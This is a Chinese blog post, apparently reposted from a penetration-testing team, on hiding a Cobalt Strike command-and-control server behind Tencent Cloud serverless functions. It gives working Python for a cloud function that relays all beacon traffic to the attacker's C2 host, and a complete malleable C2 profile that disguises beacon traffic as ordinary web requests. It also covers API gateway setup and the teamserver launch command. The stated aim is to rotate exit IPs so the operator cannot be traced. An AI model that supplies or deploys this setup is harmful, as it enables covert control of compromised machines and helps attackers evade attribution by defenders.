利用云函数隐匿C2
2022-10-27 11:48:45 Author: 渗透安全团队(查看原文) 阅读量:29 收藏

在之前我们用腾讯云函数完成了代理池的搭建,其实这个云函数还是可以用来隐藏c2的,且由于其自带cdn,所以还是很香。(其实webshell也是可以用云函数实现上线来隐藏自身真实ip的,但是还没有进行实测。)

而利用云函数隐匿C2的原理也很简单,其实我们相当于在腾讯云开启了一个代理服务,我们将我们的木马的所有流量通过腾讯云进行转发,而腾讯云有很多出口ip,会随机使用这些ip,达到了隐匿自身真实ip的目的。

云函数配置

首先我们还是进入腾讯云创建一个自定义函数。选择运行环境为python,将为们的代码复制到函数代码中,我们需要修改我们c2中的地址为我们的c2地址。这里有个坑,很多师傅们这里写的是ip:端口,经过测试,实际上其他端口是不能上线的,只有80可以,而80端口我们可以直接省略不写。(https的443端口没测试)

# coding: utf8
import json,requests,base64
def main_handler(event, context):
response = {}
path = None
headers = None
try:
C2='http://c2ip'
if 'path' in event.keys():
path=event['path']
if 'headers' in event.keys():
headers=event['headers']
if 'httpMethod' in event.keys() and event['httpMethod'] == 'GET' :
resp=requests.get(C2+path,headers=headers,verify=False)
else:
resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False)
print(resp.headers)
print(resp.content)
response={
"isBase64Encoded": True,
"statusCode": resp.status_code,
"headers": dict(resp.headers),
"body": str(base64.b64encode(resp.content))[2:-1]
}
except Exception as e:
print('error')
print(e)
finally:
return response

然后我们完成云函数的创建,进入触发器中创建一个触发器。选择触发器版本为$LATEST,触发方式为API网关触发,开启集成响应。

然后点击我们的API服务名进入API网关进行配置。

点击编辑,将路径修改为/。

此时我们已经完成了我们云函数的配置。

此时我们遍可以使用上图的公网域名中的http域名来进行上线了。

c2配置

然后此时我们要编译一个cs的profile文件,代码如下,我们通过这个文件对我们的包内容进行配置来进行收发包。

set sample_name "t";
set sleeptime "3000";
set jitter "0";
set maxdns "255";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";

http-get {

set uri "/api/x";

client {
header "Accept" "*/*";
metadata {
base64;
prepend "SESSIONID=";
header "Cookie";
}
}

server {
header "Content-Type" "application/ocsp-response";
header "content-transfer-encoding" "binary";
header "Server" "Nodejs";
output {
base64;
print;
}
}
}
http-stager {
set uri_x86 "/vue.min.js";
set uri_x64 "/bootstrap-2.min.js";
}
http-post {
set uri "/api/y";
client {
header "Accept" "*/*";
id {
base64;
prepend "JSESSION=";
header "Cookie";
}
output {
base64;
print;
}
}

server {
header "Content-Type" "application/ocsp-response";
header "content-transfer-encoding" "binary";
header "Connection" "keep-alive";
output {
base64;
print;
}
}
}

cs还自带了一个c2lint工具来帮助我们检验我们编写的profile文件是否正确。如图显示出来我们的请求内容。

然后我们使用命令启动我们的cs

./teamserver ip passwd xxx.profile

设置监听器,这里要注意端口为80,host为我们刚刚在API网关中的地址,注意需要删除前面的http及后面的:80

隐匿效果

在虚拟机中测试,可以看到我们的虽然上线的是同一个主机,但是ip是不一样的,通过查询可以发现都是腾讯云的ip,达到了我们防止被溯源的目的。

使

mac利用腾讯云函数搭建代理池

零基础学go—GO黑帽子学习笔记-4.2 凭证收割

零基础学go—GO黑帽子学习笔记-4.1 HTTP服务器基础

零基础学go—GO黑帽子学习笔记-3.4 使用BingScraping解析文档元数据

零基础学go—GO黑帽子学习笔记-3.3 msf客户端的实现


文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247493964&idx=2&sn=f180ca30a8d6e63fabb97c7d7ce57d86&chksm=c17614e3f6019df50e6c2a888906b16a54078cc979b43967017129d36cb4f8fdad29bd158bfd#rd
如有侵权请联系:admin#unsafe.sh